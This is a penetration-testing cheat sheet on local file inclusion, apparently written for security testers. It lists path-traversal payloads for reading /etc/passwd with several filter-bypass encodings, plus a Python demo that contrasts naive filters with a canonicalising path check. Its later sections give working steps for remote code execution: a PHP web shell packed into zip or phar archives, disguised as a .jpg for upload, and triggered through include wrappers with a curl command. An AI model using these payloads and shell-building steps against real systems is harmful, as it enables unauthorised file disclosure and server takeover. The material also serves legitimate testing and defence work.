LFI / Path Traversal

We can bypass traversal filters in various ways; which payload works depends on what the filter does (strip, decode, normalise) and at which stage it runs:

  • ../../../../etc/passwd (plain traversal, works when nothing is filtered)

  • ....//....//....//....//....//etc/passwd (survives a filter that strips ../ in a single, non-recursive pass: each ....// collapses to ../)

  • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd (URL-encoded, beats filters that inspect the raw query string before the server decodes it)

  • %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd (double URL-encoded, beats filters that run after the first decode when a later stage decodes again)

  • ..%c0%af..%c0%af..%c0%af/etc/passwd (overlong UTF-8 encoding of /, only works against decoders that accept invalid UTF-8; a strict decoder rejects it)

  • ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f/etc/passwd (fullwidth solidus U+FF0F, works where the backend applies Unicode normalisation such as NFKC after the filter has run)

An app may require the file name to start with a base folder such as /var/www/images. The prefix check says nothing about where the path ends up, so we can try filename=/var/www/images/../../../etc/passwd .

An app may require the file name to end with an expected extension such as .jpg. We can then try filename=../../../etc/passwd%00.jpg : the string ends in .jpg, but a C-string file layer stops at the null byte. For PHP this only works on versions before 5.3.4, which added null-byte checks to the filesystem functions.
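To see exactly which of the payloads above defeat which check, here is an added example (not code from the original page): a constructed, hypothetical request pipeline in Python modelled on a PHP-style stack, where the web server decodes once, an application filter strips ../ in a single pass or checks a prefix/suffix, and a file layer decodes again, NFKC-normalises and either truncates at NUL (old PHP) or rejects it. BASE, the filter functions and the backend behaviour are assumptions made for the demo; safe_path shows the canonicalising check that stops all of them.

```python
# Added example, not from the original page: a constructed, hypothetical
# request pipeline (server decode -> application filter -> file layer) that
# shows which traversal payloads slip past a naive filter, and a
# canonicalising check that stops them. BASE and the filters are assumptions.
import os
import unicodedata
from urllib.parse import unquote

BASE = "/var/www/images"   # assumed directory the include parameter must stay in


def naive_strip(name: str) -> str:
    """Weak sanitiser: removes '../' in one non-recursive pass ('....//' survives)."""
    return name.replace("../", "")


def prefix_check(name: str) -> bool:
    """Weak check: the name only has to start with the base folder."""
    return name.startswith(BASE + "/")


def suffix_check(name: str) -> bool:
    """Weak check: the name only has to end with the expected extension."""
    return name.endswith(".jpg")


def backend_path(name: str, legacy_nul: bool = False) -> str:
    """What the file layer of this hypothetical stack finally opens: a second,
    tolerant URL-decode, NFKC normalisation (maps U+FF0F fullwidth '/' to '/'),
    and either C-string truncation at NUL (PHP < 5.3.4) or rejection of NUL."""
    name = unquote(name)                         # second decode: undoes %25xx
    name = unicodedata.normalize("NFKC", name)   # fullwidth solidus -> '/'
    if "\x00" in name:
        if not legacy_nul:
            raise ValueError("embedded NUL rejected")   # modern behaviour
        name = name.split("\x00", 1)[0]          # legacy: open() stops at NUL
    return os.path.normpath(os.path.join(BASE, name))


def escaped(path: str) -> bool:
    """True when the resolved path lies outside BASE."""
    return os.path.commonpath([BASE, path]) != BASE


def run_traversal_payloads() -> dict:
    """Constructed variants of the bypass list, each run through
    server decode -> naive_strip -> backend_path. Maps label -> escaped?"""
    payloads = {
        "plain":      "../../../../etc/passwd",
        "doubled":    "....//....//....//....//etc/passwd",
        "url":        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
        "double-url": "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
        "fullwidth":  "..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd",
        "overlong":   "..%c0%af..%c0%af..%c0%afetc/passwd",
    }
    return {label: escaped(backend_path(naive_strip(unquote(raw))))
            for label, raw in payloads.items()}


def run_prefix_bypass() -> bool:
    """filename=/var/www/images/../../../etc/passwd passes prefix_check, then escapes."""
    name = BASE + "/../../../etc/passwd"
    return prefix_check(name) and escaped(backend_path(name))


def run_null_byte(legacy_nul: bool) -> str:
    """filename=../../../etc/passwd%00.jpg passes suffix_check; the outcome depends
    on whether the file layer truncates at NUL (old PHP) or rejects it."""
    name = unquote("../../../etc/passwd%00.jpg")
    if not suffix_check(name):
        return "blocked"
    try:
        return "escaped" if escaped(backend_path(name, legacy_nul)) else "inside"
    except ValueError:
        return "rejected"


def safe_path(name: str):
    """Hardened resolution: decode exactly once, refuse NUL, canonicalise with
    realpath (resolves '..' and symlinks) and require the result to stay under
    BASE. Returns the canonical path or None. Nothing may re-decode or
    normalise the name after this check."""
    decoded = unquote(name)
    if "\x00" in decoded:
        return None
    base = os.path.realpath(BASE)
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for label, out in run_traversal_payloads().items():
        print(f"{label:10s} escaped={out}")
    print("prefix bypass:", run_prefix_bypass())
    print("null byte, old PHP:", run_null_byte(True), "| modern:", run_null_byte(False))
    print("safe_path('../../../etc/passwd') ->", safe_path("../../../etc/passwd"))
```

Two things the run makes visible: the single-encoded payload is blocked here because this filter runs after the server's decode (it only beats filters that look at the raw query string), and the overlong %c0%af sequence is blocked because Python's decoder replaces invalid UTF-8 rather than accepting it. safe_path stops every variant not by pattern matching but by resolving the path once and comparing it against the base directory, which is the check to ask for when reporting the finding.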

PHP wrappers

It's possible to use a .zip file with the phar wrapper, since phar:// can open zip-format archives and addresses entries with a plain slash. Create a .php file with a payload, zip it, upload the archive, then request /?page=phar://uploads/payload.zip/payload.php&cmd=id . Neither phar:// nor zip:// is a remote wrapper, so they work with include() even when allow_url_include is off; zip:// does need the zip extension to be loaded.

zip://

When file upload is possible:

# Create payload (single quotes: in double quotes the shell would expand $_GET to an empty string)
echo '<?php system($_GET["cmd"]); ?>' > payload.php
# Zip it as payload.zip
zip payload.zip payload.php

# Execute commands. The zip wrapper separates archive and entry with '#', sent URL-encoded as %23
/?page=zip://uploads/payload.zip%23payload.php&cmd=id
# Some write-ups omit the entry's extension; the name must still match an entry stored in the archive
/?page=zip://uploads/payload.zip%23payload&cmd=id

phar://

File upload is needed. Build the archive with a script like this:

<?php
// Requires phar.readonly=0 at runtime (see the command below); the default is On
$phar = new Phar('shell.phar');
$phar->startBuffering();
// The entry to include later; the name is arbitrary, the extension does not matter
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// A stub is mandatory and must end with __HALT_COMPILER();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

Run the script to build the .phar, then rename it so it passes an image-extension check on upload (phar:// does not care about the archive's extension):

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Trigger the file (the archive path is relative to the including script's working directory):

curl --user-agent "PENTEST" "$URL/?parameter=phar://./shell.jpg%2Fshell.txt&cmd=id"

For more wrappers:

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams
